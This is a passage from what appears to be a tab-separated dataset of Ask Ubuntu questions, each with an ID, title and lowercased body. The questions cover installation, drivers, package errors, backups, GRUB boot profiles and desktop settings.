10.04 with 3 gigs or more of ram and they do n't have this problem . same question asked on launchpad for reference .
114680	install ubuntu without a de , e.g kde / unity / xfce , possible ?	can i install a clean ubuntu system , with no pre-installed desktop environment , like unity or xfce thanks
114687	can not get back to windows after getting my windows7 to work	i installed ubuntu to get access to a windows 7 install that was not working . i got it fixed , but now i can not get back to ubuntu . i always starts in windows .
114693	ubuntu 11.04 does not detect my tata photon +	i am trying to connect to the internet via my photon+ from the past day and have tried various suggestions on the internet and have tried to zero in to the main cause of the problem which is that my device is not detected . i have tried the following ways : 1 ) after connecting the device , i tried to create a mobile broadband connection via system > preferences > network connections and selected tata photon plus . but there was no connection . 2 ) i did sudo apt-get install usb-modeswitch-data and sudo apt-get install usb-modeswitch but the prompt said that they are at their newest version . 3 ) i tried to edit the file sudo gedit /etc/usb_modeswitch.d/12d1:1446 , but this file did not exist . 4 ) my lsusb output is nikhil @ nikhil : ~ $ lsusb bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 003 : id 22f4:0021 bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 04f2 : b159 chicony electronics co. , ltd bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub any ideas ? ?
114697	how to stop windows from opening along the edges ?	i 've notice this with ubuntu , kubuntu and xubuntu : whenever you open a window , it 's in one of the four corners . how do i stop this and make it more like windows where it remembers where the window was before ? if i ca n't do that how do i make it so it opens in the centre of the screen ?
114698	how to determine what configuration options were used for mysql server from ubuntu packages ?	how can i get compilation options that was used for mysql-server from ubuntu packages ? i fetched sources using : apt-get source mysql-server but i have to run configure : ./configure only then i have compilation options , but they are not the same with that used for compilation . i need exactly the same compilation options for pinba plugin
114699	right-click acts too fast - no fix yet , any workaround ?	when i click the right mouse button ( anywhere , be it - desktop , browser , console , etc . ) , the right-click context menu pops up so quickly that the very *first* option in the menu gets clicked . this happens too often to take it easy . this issue has been brought up a couple of times on ask ubuntu , but with no fix whatsoever . this is a very low priority issue for the ubuntu team , i believe ? ( how could they ? ! ) is there at least a workaround for the issue ? ubuntu is almost unusable for me as it is now . ps : i have a new mouse . so , please do n't go about suggesting that i get a new one - - everything 's working fine on windows 7 , so should be the case with ubuntu 11.10 , which it is not .
114703	ubuntu killed all settings , messed windows 7	after installing ubuntu to empty partition , without wubi , all my win7 programs settings were wiped , for example - bittorrent loads default settings ( iv spend a lot of time customizing it ) firefox opens with default settings every time , not saving any settings anymore . so how do i resolve this ?
114704	connect ps vita to ubuntu ?	i have recently purchased a ps ( playstation ) vita . i want to add music and videos to the device , but i can not seem to get it to connect to ubuntu . apparently , you need a content manager available only to mac and windows . does anyone know how to connect a vita to ubuntu for file transfers ?
114705	setting environment variables when executing eclipse via unity launcher icon	my question is a followup for the following : how to pin eclipse to the unity launcher ? i created eclipse 's icon to the unity launcher based on the selected answer at the above link . however , when i launch eclipse via this icon , the environment variables are not properly set . i need to call . /opt/intel/bin/compilervars.sh intel64 to use intel compiler tools in eclipse . however , launching via the icon ca n't do it . of course , running manually eclipse on the terminal is okay . i tried to place . /opt/intel/bin/compilervars.sh intel64 on several places such as /etc/profile and /etc/bash.bashrc . but , still not working . where is the best and correct place to call such environment setup ?
114707	how to delete history of totem and gedit in gnome shell ?	how can i delete history of totem and gedit in gnome shell ? i can not find a menu option to do this , unlike in gnome 2 .
114709	how to install oracle 11g	how can i install oracle 11g in ubuntu 11.10 ? i followed a link and it did not work . i migrated from red hat to ubuntu and am more familiar with it , other wise i think ubuntu is very good graphically . is oracle 11g compatible with ubuntu ? i thought i had all required dependencies for oracle 11g . is there a requirement list somewhere ?
114715	ubuntu one file went missing	i have lost the file from from ubuntu one . i used and modified the file yesterday , then saved it , then did some other not related work and then put my laptop on standby until the morning . when i resumed my work and went to my ubuntu one i could not find my file there anymore . please help ! i have ubuntu on 2 laptops and tablet . i then went to my windows machine and opened ubuntu one folder and found the file but 3 days old version with .conflict added to it . tablet is up to date but no file there . how can i get the latest version of my file that got lost from ubuntuone folder ? thank you yuriy
114718	printscreen does n't work when i 'm in a context menu	i usually take screenshots printscreen which calls into gnome-screenshots . today i noticed that it does n't work when the context menu is open . the simplest case is when i right click on desktop and press printscreen nothing happens . is this some sort of bug ? any knows how to fix this ?
114721	symbolic link to /opt	how do you : '' create as administrator ( sudo ) one link in /usr/bin to the command that you 'd like to call ( for example with8.5 and tclsh8.5 ) . one time that you had create the links you can run directly tclsh8.5 or wish8.5 in one terminal . '' http : //community.activestate.com/node/7489 does that mean to link to the particular binary from the /opt directory ?
114726	can i change what displays the launcher is shown on	in precise , when using a dual screen setting , the unity launcher is present on both screens : is it possible to have it only on the main screen ?
114728	gimp 2.7 without using ppa ?	i need to install gimp 2.7 for obvious reasons when compared to 2.6. , however the ppa : matthaeus123/mrw-gimp-svn needs more ppa which do mess with my systems libraries . is there a safe way to install gimp 2.7 ( especially latest 2.7.5 ) without messing with system libs like glib ?
114729	getting gtk-warning while using gksu	while using gksu i get gtk warning , for example : $ gksu gedit /etc/fstab ( gksu:2792 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:2792 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:2792 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:2792 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , and when i close running app ( in above example gedit ) , i get : ( gedit:2796 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory ( gedit:2796 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.8r7mbw ' : no such file or directory ( gedit:2796 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory i 'm using ubuntu 11.10 64bit . any ideas how to solve this issue ?
114732	different values in one column	is there a way to get all different values in one column in libreoffice-calc ? if i have a sheet looking like that : column1 column2 column3 a b c a b c a b c a d c a b c a b c i 'd like to know how can i find out that column2 has 2 different values , and that those 2 values are b and d. thanx
114734	trouble while installing kwin window manager	i installed the kde windows manager in ubuntu 12.04 using the command : sudo apt-get install kde-window-manager the installation was succesful . i then logged out and in the login screen only ubuntu , ubuntu 2d and awesome ( which i had installed earlier ) options are available . how do i start kwin ? ? do i need to restart for the effects to to take place ? edit 1 : i restarted my system and still no effect .
114739	how to create table and paste in libreoffice	i use ubuntu 11.10 and libreoffice.i want to do some thing shown in this video http : //www.youtube.com/watch ? v=rh7eqirzvoq using libreoffice and ubuntu . i want to know how can i create table in libreoffice calc and paste it to libreoffice writer .
114741	process gets stuck on futex_wait_queue_me ( )	i have a process that uses groovy+java and works fine on a windows machine , but on ubuntu 11.10 it hangs every a couple of minutes for a few minutes ( ! ! ) when i look at the resource monitor i see there is no cpu or memory usage and the process is in futex_wait_queue_me ( ) mode . the process is a simple loop feeding data to a db ( again , works fine on windows ) . how to resolve this ? thanks
114745	why does n't deja dup complete the backup ?	deja dup does n't complete its backups anymore . when it runs , under `` details '' i see it stucking at a certain file each time . i started it out of a terminal , and this is the message i see appearing then again and again : ** ( deja-dup:13477 ) : debug : duplicityinstance.vala:196 : running the following duplicity ( 13922 ) command : duplicity 'remove-all-but-n-full ' '3 ' ' -- force ' 'file : ///media/backup/back1110 ' ' -- gio ' ' -- verbosity=9 ' ' -- gpg-options= -- no-use-agent ' ' -- archive-dir=/home/jod/.cache/deja-dup ' ' -- log-fd=19' ** ( deja-dup:13477 ) : debug : duplicityinstance.vala:568 : duplicity ( 13922 ) exited with value 0 ** ( deja-dup:13477 ) : debug : duplicityinstance.vala:196 : running the following duplicity ( 13933 ) command : duplicity 'collection-status ' ' -- exclude=/media/backup/back1110 ' ' -- exclude=/home/jod/videos/.dvdrip ' ' -- exclude=/home/jod/kram/isos ' ' -- exclude=/home/jod/videos/aufnahmen ' ' -- exclude=/home/jod/.virtualbox vms ' ' -- exclude=/home/jod/videos/otr ' ' -- exclude=/home/jod/dropbox ' ' -- exclude=/home/jod/.shotwell/thumbs ' ' -- exclude=/home/jod/.wine ' ' -- exclude=/home/jod/.thumbnails ' ' -- exclude=/home/jod/musik ' ' -- exclude=/home/jod/.icons ' ' -- exclude=/home/jod/.themes ' ' -- exclude=/home/jod/ubuntu one ' ' -- exclude=/home/jod/.wuala ' ' -- exclude=/home/jod/wualadrive ' ' -- exclude=/home/jod/downloads ' ' -- exclude=/home/jod/.local/share/trash ' ' -- exclude=/home/jod/.xsession-errors ' ' -- exclude=/home/jod/.thumbnails ' ' -- exclude=/home/jod/.private ' ' -- exclude=/home/jod/.gvfs ' ' -- exclude=/home/jod/.adobe/flash_player/assetcache ' ' -- exclude=/home/jod/.cache/deja-dup ' ' -- exclude=/home/jod/.cache ' ' -- include=/home/jod ' ' -- exclude=/home/.ecryptfs/jod/.private ' ' -- exclude=/media/musik ' ' -- exclude=/sys ' ' -- exclude=/proc ' ' -- exclude=/tmp ' ' -- exclude=** ' ' -- gio ' 'file : ///media/backup/back1110 ' ' -- verbosity=9 ' ' -- gpg-options= -- no-use-agent ' ' -- archive-dir=/home/jod/.cache/deja-dup ' ' -- log-fd=20' ** ( deja-dup:13477 ) : debug : duplicityinstance.vala:568 : duplicity ( 13933 ) exited with value 0 this is the cpu-graph from system load indicator , you see the process cycle clearly . like this , it run the whole night throgh , so there is an error . in deja dup it switches between `` cleaning up ... '' and `` preparing ... '' . two days ago everything worked fine . how can i force deja dup to complete the backup ? maybe removing a logfile helps ?
114750	build a custom ubuntu based distribution	i am working on making a custom ubuntu 11.10 based distro . ( 64 bit ) i am adding non open source packages , replacing packages , changed user interface from unity to gnome , and more changes . my system is ready , and i want to create a redistributable image for my distro . when you go to system settings - > system info , you see a logo with the ubuntu name and logo , but i want to change it to the name and logo of my distro . also , in the boot menu , i want to change the boot entry names , and the grub background . and i want to change the name ubuntu from every possible location . also , i will be sharing it with people , so i want to make my own software repositories , like linux mint has , or any other distro has , i will purchase server space for that . also , the i want to customize the wubi installer like linux mint did and if some uses the customized tool to install my distro from windows , they should see the name of my distro in add or remove programs page . any help will be appreciated !
114754	what is the best file system to use with xubuntu 11 ?	i really dont know what any of them mean . i know that ntfs and fat and that they are associated for windows ... .for linux , which is the best file system that gets the best performance ? i have it set to ext 4 .
114758	black screen after installing ubuntu 11.10	i downloaded ubuntu 11.10 one week ago and burned it to a cd . i installed it on my system which has a 1.5 tb hard . it installed successfully and i clicked on the restart button . the computer restarted and i chose the first option , which was to load ubuntu . a black screen would appear with a cursor in top left hand side and i think the system was hung . i repeated this process by erasing the last ubuntu install but i faced a similar problem . can anybody help me ?
114759	warning : setlocale : lc_all : can not change locale	i want to switch to french locale . so i tried the below command : myubundu @ myubundu-desktop : ~ $ export lc_all=fr_fr but i am getting the warning -bash : warning : setlocale : lc_all : can not change locale ( fr_fr ) how to set the locale to french ? do i need to install additional packages ?
114761	how to install vlc ? when i get this error ?	how to install vlc ? ( with error showing such ) . root @ sun-desktop : /var/tmp # apt-get install vlc reading package lists ... done building dependency tree reading state information ... done vlc is already the newest version . the following packages were automatically installed and are no longer required : liblash3 libreoffice-l10n-common libgsf-1-common libcutter-dev pocketsphinx-hmm-wsj1 libfluidsynth1 libftgl2 projectm-data libprojectm-qt1 libgnomevfs2-extra libbml0 libprojectm2 libpocketsphinx1 libsphinxbase1 buzztard-data libbabl-0.0-0 libgegl-0.0-0 libhal1 libgsf-1-114 libsidplay1 pocketsphinx-utils liboil0.3 pocketsphinx-lm-wsj libcutter0 cutter-testing-framework-bin use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 239 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up vlc-nox ( 1.1.9-1ubuntu1.3 ) ... /var/lib/dpkg/info/vlc-nox.postinst : 10 : /usr/lib/vlc/vlc-cache-gen : not found dpkg : error processing vlc-nox ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of vlc : vlc depends on vlc-nox ( = 1.1.9-1ubuntu1.3 ) ; however : package vlc-nox is not configured yet . dpkg : error processing vlc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : vlc-nox vlc e : sub-process /usr/bin/dpkg returned an error code ( 1 ) # sudo apt-get autoremove vlc vlc-nox reading package lists ... done building dependency tree reading state information ... done package vlc is not installed , so not removed package vlc-nox is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 237 not upgraded .
114766	is there any way to log windows log messages using rsyslog ?	is there any way to log windows log messages in linux using rsyslog ? even if any other open source methods are available , then your suggestions would be appreciated . thanks in advance .
114768	shutting down with power button without x11-session	when pressing the power-button inside a ( gnome- ) session , ubuntu asks me what to do and shuts down after 60 seconds anyway . no problem so far . but if i 'm not logged in in a gnome-session ( for example in the login screen ) , or just change to a tty , then the power-button wo n't work . but i remember that i worked in 11.04 . so what 's changed and how to restore ? background : i use my machine as a print server . if im not home and my wife wants to print sth. , she used to switch on my machine , print via her laptop , and then just shut it down by power-button . beginning of march i was on a business tour , and she called me that she could not shutdown my machine anymore . i shut it down by ssh , but this seems not the favorable way to me . i already had a look in /etc/acpi/powerbtn.sh and think that the line if pidof x $ pms > /dev/null ; then exit is the cause for this since it aborts the script when no gui-power-manager is found . is that right ? but that does not explain with the power-button does not work when switching from the x11-session to a tty , although this would not be critical to me .
114771	could i add other lyrics sources to osd lyrics ( beside its default - ttplayer and xiami ) ?	osd lyrics has a very good way of displaying lyrics but its sources seem poor - compared to what i experience in windows with foobar and in ubuntu with covergloobus . the latter uses a small non-adjustable font , so i would rather prefer to use osd lyrics , were it not for this problem . many people recommend osd lyrics as the best way to display lyrics , but in fact it could n't even find lyrics for some songs of the beatles , for example , not to mention other less popular artists .
114774	notification for additional drivers	today i installed ubuntu 11.10 in my hp laptop well everything goes well installation and updates . i then got a notification on the taskbar for additional drivers : no propritery drivers are in use on this system . what i read on the tool that opens after clicking the message is : proprietry driver do not have public source code that ubuntu developer are free to modify security updates and correction depend solely on the respnsiveness of the manufacture ubuntu can not fix or improve these drivers . ati/amd proprietry fglrx graphic driver ( post release update ) 2.ati/amd proprietry fglrx graphic driver ati/amd propreitry fglrx graphics driver ( post release update ) tested by ubuntu developers license propreitry 3d accelerated propreitry graphic drivers for ati cards . this driver is required to fully utilise the 3d potential of some ati graphic and as well as provide 2d accelerate newer card . do i need to active this driver in order to accomplish the complete installation ?
114775	mapping local folder with an ubuntu one folder	trendmicro 's safesync has a nice feature , you can map your local folder to a folder in the cloud with a different name , e.g : pc1 : c : \my_documents\pictures === > office_pictures c : \my_documents\docs === > office_docs pc2 : c : \my_documents\pictures === > private_pictures c : \my_documents\docs === > private_docs would this be possible with ubuntuone ? the reason is that i have multiple computers , and i do n't want all my `` my_documents '' folders to sync across work and personal life ...
114780	dell xps l502x and mini displayport problem	i 'm buy new adapter ( minidisplayport - dvi f unitek ) last week , first connect and everything works great : ) . unfortunately next day i ca n't connect external monitor . i do n't know why : ( any ideas ? thanks : )
114783	how do i to make a second monitor work as second desktop ?	i have laptop hp compaq 610 on intel , and i want to add an additional monitor . i would like this monitor to be a second desktop and not a part of the current desktop , because my laptop resolution is 16:9 and monitor is 16:10 any ideas how this can be achieved ?
114784	fn keys for brightness not working on an hp 6735s	i use ubuntu 11.10 on hp 6735s , fn keys work for sound adjustment , but for brightness % 98 of the times not working , i mean till now only maybe three or four times it worked . always i must set the brightness from boot time ( and if i need any adjustment i must reboot and reset ) and this is screenshot for system settings -- > screen , it does not contain brightness slider ( this change recently happened before there was a slider ) . ( i couldnt upload it here because i 'm new user level 1 )
114787	ordinal not in range - ubuntu one	im using windows 7 32bits i have installed ubuntu one but when it starts i get this error : unicodedecodeerror 'ascii' 'c : \users\r\xfaben santos garcia\' 10 11 'ordinal not in range ( 128 ) ' what could it be ? i cant find solution on internet for this .
114788	libroffice colour palette	the default color palette almost only have hard colors and the alternative software has some basic colors and them several shades . to obtain the same effect in libreoffice we must change by hand the colors or there is a way to add more color palettes and we can choose which use ?
114791	hdmi device detected by the system but not listed . which is the package affected by this bug ?	i would like to report this bug , but i ca n't figure out what package is affected . it is certainly just a graphical matter because using hardinfo , running pacmd or trying to switch to hdmi in xbmc works , it 's just not listed in system settings - > sound .
114792	ubuntu - black screen after suspend	i used ubuntu with no problems and i upgraded to 11.10 and everything was fine . but when i did my first suspend i was not able to boot again , all i got was a black screen no bios screen , nothing just blank , i tried doing hard reset but when i power on again same happens . i tried ctrl+alt+delete f1-f12 but i think the keyboard is not working , also tried booting from cd but all i got was blank screen , the hard disk light is not blinking at all so i 'm assuming it 's not trying to boot . my laptop is toshiba satellite with ati radeon graphics . hibernate was working fine though . i searched the net for solutions but with no luck . any ideas ?
114793	gimp 2.8 unavailable	is it possible somehow to install gimp 2.8 to ubuntu ?
114795	how do i update clamtk virus scanner via the terminal ?	i 've decided to use clamtk on my ubuntu , the problem is that it just simply wont update the antivirus engine and the gui version from the software itself . what is the command that i could use in the terminal for the upgrade ? ( by the way , does anyone know if clamtk is a decent antivirus software ? it is listed as nยบ1 on the internet . ) is there a difference between clamav and clamtk ?
114801	how do i prevent access to the system settings for a user or group ?	i am working to set up ubuntu 11.10 on our computers at school . we have a standard account for the students and would like to prevent students from accessing the system settings . can that be done ?
114807	how to revert kde to its default settings ?	i installed kde ( kde-plasma-workspace ) in ubuntu 11.10 . after some configuration it became buggy . how can i revert to its default settings ?
114815	how to use alt + graveaccent on non-us keyboard ?	this question reveals that alt+` switches windows within a program just like alt+tab switches between open programs . wow neat , thought i , i 've always wondered why alt+tab did n't do this the way windows does . problem : on my non-us keyboard layout , the grave accent is not above the tab key . it 's a dead key next to backspace . for one thing the placement of ` makes it really cumbersome to type ; and second , it does n't work because it 's a dead key . i 'd like this to work . how can i either : reassign alt+` to alt + [ whatever key is above tab in my layout ] 1 ) , or make the alt+tab switch between open programs and windows ( like in ms windows ) ? 1 ) i 'm using a danish ( dk ) layout , but this likely affects many non-us layouts so a generic answer would help more people .
114817	upstart script : detect shift key down at boot	i want to create a boot up potential which allows a different upstart/runlevel configurations to load based upon specific key downs at boot ( or combos ) . how do i detect a key down event with an upstart script ? i 'm on 10.04 if that helps . alternative methods to achieve the same result are acceptable , i.e. , how can i use grub to do this ? to help provide more clarity , i am creating a step by step instruction based upon both answers given by tuminoid and lumbric . ( please help me improve this , my interpretation of tuminoid 's answer does not work . ) note : everyone must have a reason for doing this . to give meaning to the following two step-by-step solutions , i 'll describe my purpose for wanting to have upstart scripts decided at boot . i am creating a live dvd for surfing the internet called surfer . for security , i want to disable the admin account and leave a non-privileged account for surfing the web . i also want to give myself and users the ability to remaster surfer so they can add more online apps and customise their surfer account , then burn their own live custom surfer iso . so i will need two boot profiles : surfer and remaster . one for secure online surfing , the other for remastering and development . lumbric 's solution create a custom grub file 1 . to add custom entries to grub , open this file with gedit for editing : gksudo gedit /etc/grub.d/40_custom you will have the right file if you see this text in it : # ! /bin/sh exec tail -n +3 $ 0 # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . 2 . in another gedit tab , open : /boot/grub/grub.cfg 3 . in grub.cfg , look for sections that begin with : menuentry choose the default entry you use for booting . if you do not know the default entry by looking at this file , then reboot and take a note of the one you pick at boot . do not save any changes if you have to reboot to find your default entry . when you are positive of your default entry , keep note that this is the entry to use for your custom profiles . each menuentry section will have some corresponding set of brackets : menuentry ... text left out ... { ... text left out ... } that encapsulate a few lines of text . copy the your default entry section . copy from the word menuentry to the closing bracket . i will need two entries , so i will paste my default entry twice . it should look something like the following for two custom boot profile entries . ( keep in mind i took out text to make this easier to read ) : # ! /bin/sh exec tail -n +3 $ 0 # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . menuentry ... text left out ... { ... text left out ... } menuentry ... text left out ... { ... text left out ... } 4 . find your boot line by pressing ctrl + f. type in the search field : linux /boot each boot line will should be highlighted . 5 . cut and paste this text at the end of the highlighted boot line , but change the number for each entry . boot-profile=1 after pasting , the menu entry should look similar to this : menuentry ... text left out ... { ... text left out ... linux /boot/vmlinuz-2.6.35-22-generic root=uuid=66cdrfwec91-0070-32f-b666-c9f2232j23232j ro quiet splash boot-profile=1 } menuentry ... text left out ... { ... text left out ... linux /boot/vmlinuz-2.6.35-22-generic root=uuid=66cdrfwec91-0070-32f-b666-c9f2232j23232j ro quiet splash boot-profile=2 } 6 . now , we will edit the line we see at boot . for the menu entry identified above , edit the text that is between the word menuentry and the first bracket . replace with the text surfer : menuentry `` surfer '' { ... text left out ... linux /boot/vmlinuz-2.6.35-22-generic root=uuid=66cdrfwec91-0070-32f-b666-c9f2232j23232j ro quiet splash boot-profile=1 } do the same for remaster entry : menuentry `` remaster '' { ... text left out ... linux /boot/vmlinuz-2.6.35-22-generic root=uuid=66cdrfwec91-0070-32f-b666-c9f2232j23232j ro quiet splash boot-profile=2 } 7 . save the file 40_custom . 8 . now , update grub with this command : sudo update-grub note : if you do any upgrading or installation of programs that modify your kernel , be aware of lumbric 's point made in his link . how can we know if our kernel is going to be upgraded ? help me clarify how we can prevent upgrading our kernel without knowing it . 9 . reboot . when at the boot menu , look for your new entries . if you see them , things are going great so far . choose one of your custom entries and hit enter . 10 . when logged in , open up terminal . enter this command . cat /proc/cmdline grub writes the boot line to this file . the boot line is where you added boot-profile=1 at the end . so , if you chose surfer , then it should read boot-profile=1 at the end or boot-profile=2 if you chose remaster . if not , reread from step one and correct any logical errors . 11 . now , the script must be written that will handle the boot entry chosen from grub menu . i 'm choosing to use an upstart script , because i know how to do that . the upstart will start as soon as possible , check the contents of /proc/cmdline and use that to determine our choice at the boot menu . here is the upstart start script : /etc/bootchoice.conf 12 . past the following text in : task start on startup or bootchoice script profile= $ ( cat /proc/cmdline |sed 's/.*boot-profile=\ ( [ 0-9 ] \ ) . */\1/g ' ) case $ profile in 1 ) # run script for surfer profile initctl emit surferboot ; ; 2 ) # run script for remaster profile initctl emit remasterboot ; ; * ) echo error echo `` error '' > /error ; ; esac end script 13 . now , a signal will be emitted based on our choice . in order to handle each signal , two files must be created . one called : surfer.conf and another called remaster.conf . place them in /etc/init/ . their contents will be similar to this : # surfer user boot task start on surferboot script echo `` surfer test-data '' > /home/surfer/surfer end script we can see that when the surferboot signal is emitted , that the script above is started determined by this line : start on surferboot place all custom boot script code between script and end script . same thing will be done for remaster . i tried this , it works . thanks lumbric . tuminoid 's solution first , we must let grub know we want to call a script . we will place the path of the script inside /etc/default/grub . 1 . open the file : /etc/default/grub . gksudo gedit /etc/default/grub 2 . add this line at the end of the file : init=/sbin/preinit 3 . save and exit . then , run this command : update-grub now we will create the file that we made grub aware of . 4 . create the file with gedit : gksudo gedit /sbin/preinit 5 . paste the following text inside : # ! /bin/sh event= '' startup '' while [ /bin/true ] ; do echo `` select boot : '' echo `` 1 ) surfer '' echo `` 2 ) remaster '' echo `` '' read selection case `` $ selection '' in 1 ) event= '' surfer '' ; ; 2 ) event= '' remaster '' ; ; * ) ; ; esac done exec /sbin/init -- startup-event= $ event 6 . make the script executable : chmod +x /sbin/preinit wip note : i 've tried this up to this point and it does not work . please help improve this interpretation of the answer by pointing out where i am going wrong . last section : this section unfinished . waiting for clarity on first steps to finish . the events above are upstart signals . if you have n't used upstart signals , they will call a script in the directory : /etc/init . so , i will make two files in /etc/init called : /etc/init/surfer.conf /etc/init/remaster.conf in these files i will use bash scripts to configure each boot . i will create at upstart /etc/gdm/custom.conf to force an auto-login if surfer is chosen . i will also open /etc/shadow and disable remasters password . alternatively , i will create /etc/gdm/custom.conf for a forced auto-login to the user remaster for remastering and development .
114820	ca n't remove libreoffice3.5-dict-de package	i just installed the wrong version of libreoffice ( x86 instead of 64bit ) . so i tried to remove it but i get this error : > aptitude remove libreoffice3.5-dict-de could n't find package `` libreoffice3.5-dict-de '' . however , the following packages contain `` libreoffice3.5-dict-de '' in their name : libreoffice3.5-dict-de could n't find package `` libreoffice3.5-dict-de '' . however , the following packages contain `` libreoffice3.5-dict-de '' in their name : libreoffice3.5-dict-de no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 2 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . the same happens when i try to use `` software management '' . what 's going on ? aptitude : 0.6.4-1ubuntu2 ubuntu 11.10 oneiric
114823	how can i change permissions of a folder , including its enclosed files and subdirectories ?	i need to recursively change the permissions of all folders , sub-folders and files from within ~/.local/share/trash/expunged does anyone have a clue or idea on how to do this ? i have tried following the instructions from this question but to no avail . chmod -r ug+rw < foldername > does n't seem to be working for this folder , its subdirectories , or enclosed files . does anyone know the chmod command to change these permissions ? for example : root @ santos : /home/santos/.local/share/trash # ls -l total 12 drwx -- -- -- 3 santos santos 4096 mar 21 21:38 expunged drwx -- -- -- 2 santos santos 4096 mar 21 21:38 files drwx -- -- -- 2 santos santos 4096 mar 21 21:38 info
114824	why is the top menu-bar not accessable when previewing open windows of an application ?	if i have more than one window of the same application running then clicking its icon in the launcher displays a preview of that application 's open windows , when this preview is activated i ca n't click on any of the icons in the ubuntu menu-bar/panel/top bar ( although hovering over them does highlight the icons ) . it seems odd that you can highlight the icons but pressing them has no effect . is this behaviour normal , a bug , or a slight design flaw ? i only noticed because i wanted to shut down when previewing the open windows and could n't click on the panel power icon .
114833	apt-get doesnt download files from nfs location	i have switched to unix from last 3 months and trying to understand install process and in particular apt-get . i am able to successfully install and download the packages when i configure my repository on http location in /etc/apt/sources.list file . e.g . deb http : //web.myspqce.com/u/eng/rose/debian-mirror-squeeze-amd64/mirror/ftp.us.debian.org/debian/ squeeze main contrib non-free this command will download ( /var/cache/apt/archive ) and install the package when i use apt-get install when i change the source location to file instead of http ( nfs mount point ) , the package is getting installed but not getting downloaded in /var/cache/apt/archive . deb file : /deb_repository/debian-mirror-squeeze-amd64/mirror/ftp.us.debian.org/debian/ squeeze main contrib non-free please let me know if there is any configuration or settings that i have to make to let apt-get to both download and install package when i use ( nfs ) file : / instead of http : / in sources.list . to achieve this , i can use apt-get -- downlaod-only and then use apt-get install for both download and install in two separate calls , but i want to know why package is not getting downloaded with apt-get install but only getting installed when used with file : / in sources.list
114835	is it possible to use 'dch -r ' but not end up in an interactive editor ?	i 'm trying use dch -r to update the debfullname , debemail , and timestamp in a debian/changelog for automated building of a package . normally , i 'd use dch with -r to do this . but this drops me into an interactive editor . is it possible to suppress that and just save it immediately ?
114838	lubuntu does n't boot	i 've installed lubuntu 11.10 on my old desktop pc . sometimes lubuntu boots correctly , but after a shutdown or a reboot it does n't start . when i should see grub screen i see only a black screen . the computer is a amd athlon 1000 mhz , 256mb ram , 32gb hard disk , ati xpert video .
114839	how do i access files in the partition that ubuntu is installed on ?	i have two partitions : partition c : / is where windows is installed , and partition d : / is where ubuntu is installed . however there is still free space in d : / partition that i can access with windows and save files there . i am unable to access those files that are saved in the same partition as ubuntu ( that is partition d : / ) . ( i can access files in c : / partition from ubuntu ) the partition where ubuntu is installed has more free space . from windows , partition d : / looks like this d : /ubuntu , d : /other_staff well from ubuntu i am unable to access that other_staff .
114840	how to back up and restore chrome in ubuntu ?	i back up chrome in windows with google chrome backup , that it saves a file with *.gcb format . now , how could i restore it in ubuntu 11.10 ? in other word : how could i back up and restore chrome in ubuntu ?
114841	why does aptitude give me the `` does not have super cow powers '' error ?	when i try to update 11.10 with current updates , i receive this error message stating does not have super cow powers . why is it not updating with the current security packages ?
114844	how can i reply to email by sending a delivery failure message ?	occasionally , i receive unwanted emails , particularly low-volume spam , or email messages falsely addressed to me ( possibly due to typos ) . i do n't want to spend the energy to write a personal message , but i do want to let the sender know that the message never arrived at its destination , and that resending it will be useless . in my opinion , a delivery error message to the sender will fill that need . so , the question is if there is an easy way to send error messages back to the sender . is there any email client out there which supports sending delivery failure messages as a reply to incoming email -- ideally in one click ? ( or , which can be configured to do so ? ) alternatively , what is the best way to set up an environment that allows me to send delivery failure messages without too much effort per message sent ?
114845	is there a `net` view like command ?	net is a windows command line tool that can do a lot of stuff around networking . if you add an argument like view to the net command ( new view ) it will search everything in your network . is there a command for linux that can search everything in your network users and such ?
114850	how to make a video call using facebook ?	i need to make a video call using facebook , but i ca n't . can anyone help me with this . thank you .
114854	why is lshw only listing one of my two hdds ?	i have a 120gb hdd and a 1tb hdd in the system . i installed ubuntu server using lvm on the 120gb . after installation i added the 1tb to the existing volume group and added 10gb to /home as a test . my understanding is that lshw is supposed to list hardware . what 's the difference here ? mark @ server : ~ $ sudo lshw -short -c disk h/w path device class description ========================================================= /0/100/1f.2/0 /dev/sda disk 120gb st3120026as /0/100/1f.2/1 /dev/cdrom disk dvd+-rw gh50n /0/1/0.0.0 /dev/sdc disk scsi disk /0/1/0.0.1 /dev/sdd disk scsi disk /0/1/0.0.2 /dev/sde disk scsi disk /0/1/0.0.3 /dev/sdf disk scsi disk the 1tb only shows up as a volume , not as a disk . mark @ server : ~ $ sudo lshw -short ... . /0/100/1f.2/0 /dev/sda disk 120gb st3120026as /0/100/1f.2/0/1 /dev/sda1 volume 476mib linux filesystem partition /0/100/1f.2/0/2 /dev/sda2 volume 111gib linux lvm physical volume partition /0/100/1f.2/1 /dev/cdrom disk dvd+-rw gh50n /0/100/1f.2/0.0.0 /dev/sdb volume 931gib wdc wd1001fals-0 thanks , mark
